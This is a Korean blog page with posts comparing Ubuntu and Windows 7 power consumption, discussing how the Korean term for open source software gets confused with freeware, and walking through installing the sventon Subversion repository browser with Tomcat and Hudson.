저도 최근 업무상 미팅중에  오픈소스SW의 탄소배출량 절감효과 연구에 대한 의견을 나눈적이 있었습니다. 내친김에 자료를 좀 찾아보았는데, Ubuntu 와 Windows 7 을 비교한 자료(2011년6월29일 발표)가 있어서 공유합니다.

Surprising Power Consumption Of Ubuntu 11.04 vs. Windows 7
- Source : http://www.phoronix.com/scan.php?page=article&item=windows_ubuntu_pow&num=9

- 게임을 하는 동안은 우분투가 약간 높은 전력소모


- 부팅하는 동안은 윈도우7 이 약간 높은 전력소모


- HD 비디오를 재생하는 순간에는 우분투가 더 높은 전력소모

- 가벼운 데스크탑의 사용에서는 두 운영체제가 비슷비슷


내용을 요약하면, 마이크로소프트에서 이야기하는 자료를 근거로 보면 이전의 윈도우보다 Windows 7 이 에너지 절감에 도움이 되고, Ubuntu 11.04 vs. Windows 7 은 일장 일단이 있는 비슷비슷한 상태라는 이야기네요.

향후 오픈소스SW의 탄소배출량 절감에 대한 좀 더 심도있는 연구를 수행해서 현재의 운영체제 단위의 비교가 아니라 업무 도메인별로 오픈소스SW 스택 단위를 비교한다면 오픈소스SW에 대한 신뢰성을 제고할 수 있는 자료로 쓰일수 있겠습니다.



참고자료
- Ubuntu 9.04 vs Windows 7 Energy consumption test
http://blog.o-lab.se/2009/09/ubuntu-9-04-vs-windows-7-energy-consumption-test/

- Linux vs. Windows Power Usage
http://www.phoronix.com/scan.php?page=article&item=880&num=1

- Surprising Power Consumption Of Ubuntu 11.04 vs. Windows 7
http://www.phoronix.com/scan.php?page=article&item=windows_ubuntu_pow&num=9


메일링으로 도착한 정보를 읽다가 공개SW 사용기 공모전 (http://www.oss.kr/7777) 을 하는것을 보았습니다.

참여한 글의 수가 생각보다 많은것을 보고 사람들의 관심이 높아진것 같고 공개SW역량프라자에서 많은 일을 하는구나 하는 생각으로 사용기를 쭈욱 읽어보았습니다. 그런데 사용기를 제출한 몇몇분들의 글을 보니, 공개SW와 프리웨어를 구분하지 않고 쓴것들이 보입니다. (오픈캡처, smmemo 같은 SW는 프리웨어죠)



2004년 이후로 공개SW라는 단어를 산업계에 이해시키기 위해서 많은 노력을 해왔기 때문에, 이제 공개SW라는 단어가 제법 많이 알려진 상태입니다.
하지만 공개SW란 비용의 관점이 아니고 소스코드의 관점에서 해석되는 단어임에도 불구하고, 많은 사람들이 아직도 공개SW라는 단어를 비용의 관점에서 해석해서 공짜SW로 이해하고 있는경우를 만납니다.(http://www.opensource.org/docs/definition.php)


source - http://goo.gl/57lKP

여전히 공개SW는 무료인가요? 라는 질문을 종종 받습니다.

공개SW라는 단어의 정의를 재차 설명해야 하는 경우가 많다는 사실을 보면
Open Source Software라는 단어의 현지화 과정에서 무언가 잘못된 것은 아닐까 하고 생각해봅니다.

SW를 분류할때 비용의 관점에서 보면 Freeware, Shareware, ADware, Commercial Software 등으로 나누어지고,
소스코드의 공유관점에서 보면 Open Source Software, Close Source Software 로 나눌수 있습니다.

그런데 'Open Source Software'를 현지화하면서 '공개SW' 라고 이름지었고,  그 과정에서 'Source'라는 키워드가 사라진것으로 인해 소스코드관점인지, 비용관점인지 모호해졌고, 그 때문에 Open Source Software, Freeware, Shareware에 대한 식별이 어려워진건 아닐까요?

공개SW라는 단어가 소스코드의 관점이라는 사실이 직관적이지 않으니,  그냥 OSS(Open Source Software)라고 사용한다면 좀더 이해하기 쉽지 않을까요?


참고

freeware
- 프리웨어(공개 소프트웨어)는 금전적인 지불 없이, 제작자가 무료로 사용할 수 있도록 배포하는 프로그램을 말합니다.

shareware
- 쉐어웨어도 무료로 사용이 가능하나, 일정 기간동안만 사용하도록 정해진 프로그램입니다.  만약 계속 이용하고 싶다면, 프로그램을 구입하여 이용할 수 있습니다.

Open Sorce software
- 오픈소스는 소스 코드에 대한 접근이 허용돼 공통적으로 합의된 규칙에 따라 누구나 쉽게 사용할 수 있고, 제 3자에 의한 수정 및 배포가 가능합니다.

The Open Source Definition
- http://www.opensource.org/docs/definition.php

The Open Source Definition 번역본(2002)
- http://korea.gnu.org/people/chsong/copyleft/osd-korean.html

The Open Source Definition 번역본(2006)
- http://goo.gl/ySlpA

데비안 자유 소프트웨어 지침(DFSG, Debian Free Software Guidelines)  번역본
- http://goo.gl/GgXFs




Nice Subversion Repository Browser

개요


소스코드 버전관리를 위해서 svn을 많이 사용하고 계시죠?

이번에 소개하는 sventon은 소스코드 버전관리를 위해서 subversion을 사용하는 경우, 코드 저장소를 웹기반으로 탐색할 수  있도록 도와주는 공개SW 입니다. sventon은 java로 작성되어 war파일만 구동가능하면 되기 때문에 다른 웹기반 svn 저장소 브라우저들에 비해서 설치가 간단하고, 사용하기도 좋으니 svn web client를 고민하고 계시다면 사용해 보시기 바랍니다.





설치 및 환경설정

1) sventon website - http://www.sventon.org/




2) 다운로드
- 최신의 배포파일을 다운로드 받아서 압축을 해제하는 것으로 설치준비가 모두 끝납니다.



3) 압축해제

- sventon은 java war파일로 배포되기 때문에 war를 구동할 수 있는 was가 필요합니다. 저는 tomcat을 사용하도록 하겠습니다.  압축을 해제하면 아래와 같은 내용이 있습니다.




4) 설치
- 압축해제한 파일 중 svn.war 파일을 tomcat 루트(webapp)안에 복사해두고 tomcat을 재시작 하시거나, 또는 tomcat manager로 war파일을 배포하시면 war파일이 context로 자동 배포됩니다. 설치는 이것으로 끝입니다.




5) 설치확인 - 재시작 후 http://yourdomain:8080/svn/ 경로로 접근하면 초기설정이 가능한 화면을 만나게 됩니다.

<sventon 초기 설정화면>


<sventon repository 선택>


<svn에 접근가능한 계정으로 로그인을 요구하는 로그인 화면>



주요기능
- svn의 상태를 웹기반으로 제공
- diff 기능
- 여러개의 코드 저장소 지원
- zip파일로 코드 다운로드 지원


메인화면에서 아래에 표시한 붉은색 부분을 클릭하면 수행가능한 명령이 나타납니다.



<소스코드저장소 변경>



메인화면 오른쪽하단의 drag&drop tray를 이용하면 드래그한 파일들끼리 비교하거나 zip파일로 다운로드 가능합니다.





기타활용 - hudson plugin

hudson 과 sventon 연동을 하면 더육 효과적입니다.

1) hudson의 configure 화면에서 아래 이미지처럼 Source Code Management -> Repository browser -> sventon 2.x 으로 설정하고, URL에 설치한 sventon의 주소를 입력합니다.  (ex. https://yourdomain:8080/svn/)


2) Repository Instance (ex. 생성한 프로젝트명)
저장소에 생성한 프로젝트명을 입력합니다.

3) 환경설정을 저장 후 , 허드슨가서 build now를 클릭하시고, 변경된 히스토리를 확인합니다.
(프로젝트 -> Changes -> sventon 2.x 에서 확인)


history에서 Sventon 2.x를 클릭하시면 아래와 같은 sventon의 화면을 만날수 있습니다.




diff의 결과를 시각적으로 확인가능합니다.



svn client 기능비교
이 외의 다양한 Subversion Repository Browser 들에 대한 비교자료는 아래링크를 참고하세요.
http://en.wikipedia.org/wiki/Comparison_of_Subversion_clients

이번에는 상금도 조금 더 늘어나고, 공모분야도 다양하네요. 

인텔 Meego, SKT, Naver 등도 관심이 있다고 하니, 많은 관심 바랍니다. :-)


홈페이지 : http://project.oss.kr/



홈페이지 : http://project.oss.kr/

+ Recent posts